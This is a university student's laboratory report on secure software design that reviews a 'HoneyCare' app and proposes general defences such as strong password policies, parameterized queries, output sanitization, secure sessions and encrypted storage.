PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

LABORATORY REPORT NO. 10

Designing Secure Software Systems

OVERVIEW

The objective of this laboratory activity is to explore the principles and techniques for
designing secure software systems. Security is a critical aspect of software design, as it
ensures the protection of sensitive data, prevents unauthorized access, and mitigates
potential security vulnerabilities. In this lab, we will delve into the key considerations, best
practices, and design patterns for building secure software systems, with a focus on
ensuring confidentiality, integrity, and availability.

OBJECTIVES

• Understand the importance of designing secure software systems.

• Explore the principles and techniques for designing secure software architectures.
• Gain practical experience in applying security practices to software designs.
• Analyze the impact of secure design decisions on software security and reliability.

ABSTRACT

Ensuring the security of software systems is a critical concern in today's digital

landscape. While secure system design is important, security must also be considered
during the programming phase to prevent vulnerabilities that can be exploited by attackers.
However, assessing system security is a challenging task. Security testing, verification, and
validation processes should focus on evaluating a system's ability to resist various types of
attacks. Nonetheless, security assessments are difficult due to the nature of security
requirements and the ingenuity of intelligent attackers.

Security testing poses two fundamental challenges. Firstly, security requirements

often state what should not happen, making it impossible to prove that a system is free from
vulnerabilities. Secondly, attackers actively search for vulnerabilities, experimenting with
systems and exploiting assumptions made by developers. They utilize software tools to
analyze systems over time, continually discovering new attack vectors.

PANGASINAN STATE UNIVERSITY 1

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

Several approaches are employed to assess and ensure the security of software
systems. Experience-based testing involves analyzing systems against known types of
attacks, developing test cases, or examining source code. Penetration testing involves
engaging external experts to simulate attacks and breach system security. Tool-based
analysis relies on security tools, such as password checkers or static analysis tools, to
identify vulnerabilities. Formal verification, although less commonly used, aims to
mathematically prove that a system conforms to its security requirements.

Given the time constraints of testing, a risk-based approach is often adopted,

focusing on the most significant risks identified through risk analysis. Testing not only
verifies system compliance with security requirements but also aims to identify
vulnerabilities through alternative attack vectors.

Overall, ensuring software system security requires a combination of approaches,

expertise, and ongoing vigilance. Security practices should be integrated throughout the
software development lifecycle, and measures should be regularly updated to address
emerging vulnerabilities. By understanding the challenges involved and implementing
comprehensive security measures, software systems can better withstand evolving threats.

DISCUSSION

It is critical to ensure the highest level of security for software projects in order to
protect user data, maintain system integrity, and prevent unauthorized access and
malicious activity. We will go into the present project design and thoroughly evaluate it to
uncover any security flaws in this detailed review. We may strengthen the project's overall
security posture and effectively limit potential risks by detecting and addressing these
vulnerabilities astutely.

Analysis of Design for Security Vulnerabilities:

1. User Authentication and Access:
- When I use the HoneyCare app, it makes sure it's really me before granting
access. It asks for my username and password and checks them against its stored
records. Depending on whether I'm a regular user or an admin, the app determines
what I'm allowed to do and what actions I can take.

PANGASINAN STATE UNIVERSITY 2

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

2. Protection of Personal Data:

- The HoneyCare app takes the security of my personal information seriously. It uses
fancy encryption techniques to scramble my sensitive data, making it unreadable to
unauthorized people. Even if there's a breach, the app has measures in place to
handle the situation and keep my information safe.

3. Secure Communication:
- The HoneyCare app values my privacy when it comes to the messages I send. It
uses clever methods to prevent anyone from intercepting or tampering with my data.
It also makes sure to establish connections only with trusted servers and avoids any
suspicious impostors.

4. Input Validation and Content Safety:

- The HoneyCare app is diligent in checking and validating the input I provide to
prevent any potential issues. It looks out for malicious code or harmful inputs and
stops them from causing any harm. Additionally, the app ensures that I won't
encounter any hidden malicious code in the content I see, protecting me from
unintentional risks.

5. Session Security:
- The HoneyCare app prioritizes the security of my session while I'm using it. It
implements measures to prevent session hijacking or unauthorized monitoring of my
activities. It also takes steps to ensure that no one else can use my session without
authorization.

6. Error Handling and Logging:

- If something goes wrong within the HoneyCare app, it handles it in a secure
manner while safeguarding my information. The app is careful not to reveal sensitive
details in error messages to prevent any unauthorized access. Moreover, it keeps a
record of system activities through logs and promptly notifies the relevant team in
case of any security issues.

PANGASINAN STATE UNIVERSITY 3

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

7. Third-Party Dependencies:
- The HoneyCare app relies on external tools and software to function effectively. But
it doesn't trust them blindly! It thoroughly evaluates the security of these
dependencies to ensure they don't compromise user safety. The app also stays
proactive in keeping these dependencies up to date, addressing any known security
vulnerabilities.

8. Security Assessment:
- The HoneyCare app regularly assesses its security to identify and address potential
weaknesses. It brings in skilled professionals to conduct penetration testing, actively
searching for vulnerabilities. Additionally, the app undergoes thorough code reviews
to detect any hidden security risks.

In this section, we will meticulously analyze the project's design to identify any
conceivable security vulnerabilities. Our objective is to propose discreet design
modifications that effectively mitigate these risks. Through the resolution of these
vulnerabilities and the adoption of resilient security practices, we can significantly fortify the
project's overall security stance while simultaneously safeguarding user data and
preserving system integrity.

Potential security risks and propose design changes to mitigate them.

1. Risk: Weak Passwords

- Potential Risk: Users might choose weak passwords that are easy to guess,
leaving their accounts vulnerable to unauthorized access.
- Proposed Design Change: It is essential to implement a password strength policy
that enforces the use of strong passwords. This policy should include requirements
like a minimum length and a combination of letters, numbers, and special characters.
Additionally, during the registration process, it would be valuable to educate users
about the significance of strong passwords and the potential risks associated with
weak ones.

2. Risk: SQL Injection Attacks

- Potential Risk: Without adequate input validation, attackers can inject malicious

PANGASINAN STATE UNIVERSITY 4

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

SQL statements, potentially gaining unauthorized access or manipulating data.

- Proposed Design Change: To mitigate this risk, it is crucial to have stringent input
validation and utilize parameterized queries for all database interactions. This
approach ensures that user input is thoroughly sanitized, eliminating the possibility of
SQL injection attacks.

3. Risk: Cross-Site Scripting (XSS) Attacks

- Potential Risk: If output sanitization is not properly implemented, attackers can
inject malicious scripts into web pages viewed by other users, compromising their
accounts or stealing sensitive information.
- Proposed Design Change: To address this risk, it is important to implement
output sanitization techniques, such as encoding user-generated content. Regularly
updating and patching web frameworks and libraries is also crucial to address any
known vulnerabilities and provide a secure browsing experience for users.

4. Risk: Insecure Session Management

- Potential Risk: Weak session management can lead to session hijacking or
session fixation attacks, enabling unauthorized individuals to gain access to user
accounts.
- Proposed Design Change: Enhancing security involves implementing secure
session management techniques, such as using secure tokens, enforcing session
expiration, and regenerating session IDs upon login and logout. Additionally,
considering the implementation of multi-factor authentication adds an extra layer of
protection to user accounts.

5. Risk: Insufficient Logging and Monitoring

- Potential Risk: Inadequate logging and monitoring can make it challenging to
detect and respond to security incidents, such as unauthorized access attempts or
suspicious activities.
- Proposed Design Change: To address this risk, it is crucial to implement
comprehensive logging mechanisms that record user actions, system events, and
potential security incidents. Establishing a robust monitoring system that alerts
administrators of any unusual activities enables them to promptly investigate and
take appropriate action.

PANGASINAN STATE UNIVERSITY 5

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

6. Risk: Insecure Data Storage

- Potential Risk: Storing sensitive user information in an insecure manner, such as
plain text or weak encryption, can result in data breaches and compromise user
privacy.
- Proposed Design Change: To mitigate this risk, it is essential to implement strong
encryption algorithms to protect sensitive data at rest. Employing secure storage
practices and access controls further prevents unauthorized access to the database
or file system, ensuring the privacy and security of user data.

7. Risk: Third-Party Vulnerabilities

- Potential Risk: Relying on insecure or outdated third-party libraries or frameworks
can introduce vulnerabilities that attackers can exploit.
- Proposed Design Change: Mitigating this risk involves regularly updating and
patching all third-party dependencies to address any known security vulnerabilities.
Keeping an eye on security advisories and promptly applying patches is crucial in
maintaining a secure application environment. Additionally, considering security
assessments of third-party components before integration provides an extra layer of
protection.

By implementing these design changes, the HoneyCare app can significantly reduce
potential security risks, enhancing overall security. These measures aim to protect user
data and ensure a safe and secure user experience.

Security enhancements and their impact on the system's design.

The suggested HoneyCare app security changes are intended to resolve flaws and
boost overall system security. These enhancements will have a substantial influence on the
app's design, delivering a safer user experience and safeguarding sensitive data from
possible threats. Here are the enhancements and their impact on the app's design:

1. Password Strength Policy:

- Enhancement: Implement a password strength policy that requires users to
create strong passwords.
- Impact on Design: This enhancement ensures that users choose passwords that

PANGASINAN STATE UNIVERSITY 6

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

are difficult to guess, making it harder for unauthorized individuals to gain access to
their accounts. It adds an extra layer of protection to safeguard sensitive information.

2. Input Validation and Parameterized Queries:

- Enhancement: Improve input validation and use parameterized queries for all
database interactions.
- Impact on Design: By strengthening input validation, we can prevent attackers
from injecting malicious code through user input. Parameterized queries protect
against SQL injection attacks, securing the integrity and confidentiality of the
database.

3. Output Sanitization:
- Enhancement: Implement techniques to sanitize output and prevent cross-site
scripting (XSS) attacks.
- Impact on Design: This enhancement ensures that any user-generated content
displayed on the app is properly sanitized, preventing the execution of malicious
scripts by attackers. It enhances user safety and protects against unauthorized
access to accounts.

4. Secure Session Management:

- Enhancement: Implement secure session management techniques, including the
use of secure tokens and session expiration.
- Impact on Design: With secure session management, the app can prevent
unauthorized access to user accounts by implementing measures such as secure
tokens and session expiration. This enhancement strengthens the app's
authentication and authorization mechanisms.
5. Comprehensive Logging and Monitoring:
- Enhancement: Enhance logging mechanisms and establish a robust monitoring
system.
- Impact on Design: By implementing comprehensive logging and monitoring, the
app gains the ability to track and record user activities, system events, and potential
security incidents. This enables administrators to identify any suspicious activities
and respond promptly to mitigate risks.

PANGASINAN STATE UNIVERSITY 7

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

6. Secure Data Storage:

- Enhancement: Strengthen data storage security with strong encryption algorithms
and secure storage practices.
- Impact on Design: This enhancement ensures that sensitive user data is
protected through the use of strong encryption algorithms. Secure storage practices
and access controls further safeguard against unauthorized access, reducing the risk
of data breaches and protecting user privacy.

7. Regular Updating and Patching of Third-Party Dependencies:

- Enhancement: Keep third-party dependencies up to date by regularly updating
and patching them.
- Impact on Design: By staying updated with the latest security patches and fixes,
the app minimizes the risk of exploiting vulnerabilities present in third-party libraries
or frameworks. Regular updates ensure a more secure environment for the app and
its users.

By incorporating these security enhancements into the system's design, the

HoneyCare app can significantly improve its resilience against potential threats and protect
user data. These enhancements establish a stronger security foundation and provide users
with a safer and more secure experience while using the app.

CONCLUSION

In conclusion, when evaluating the security vulnerabilities in the current

design of the HoneyCare app, it becomes apparent that considerable attention has been
given to safeguarding user data and ensuring a secure user experience. The app
incorporates several security measures to verify user identities, encrypt sensitive
information, and establish secure channels for communication. It also emphasizes the
importance of validating user inputs, maintaining content integrity, securing user sessions,
handling errors effectively, and maintaining comprehensive logs.
Although the app's existing design is commendable, there are still
opportunities for further enhancement. Strengthening user authentication by implementing
measures like temporarily locking accounts after multiple failed login attempts can provide
an additional layer of security against unauthorized access attempts. It is crucial to ensure

PANGASINAN STATE UNIVERSITY 8

PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

that robust encryption techniques are employed and that secure practices for managing
encryption keys are followed to maintain the confidentiality of user data.

To ensure secure communication, the app should continue using reliable

protocols and take precautionary measures to prevent potential attacks that may
compromise data integrity or confidentiality. Implementing thorough input validation
techniques can effectively protect against common vulnerabilities, such as injecting
malicious code or scripts. Additionally, improving session management techniques and
refining error handling mechanisms will bolster the app's ability to safeguard user sessions
and protect sensitive information.

The app's proactive approach in monitoring and updating third-party

dependencies demonstrates its commitment to addressing potential vulnerabilities. Regular
security assessments, including comprehensive tests to uncover hidden risks and
meticulous code reviews, play a pivotal role in maintaining a resilient system that can
effectively combat emerging threats.

By embracing these opportunities for improvement and implementing the

recommended design changes, the HoneyCare app can fortify its security measures and
provide users with an unparalleled level of safety and peace of mind. The unwavering
dedication to user privacy and data protection will foster trust and confidence among users,
cementing the app's reputation as a reliable and secure platform.

REFERENCES

Sommerville, I. (2016b). Software Engineering, Global Edition (10th Edition). Pearson

Higher Ed.

PANGASINAN STATE UNIVERSITY 9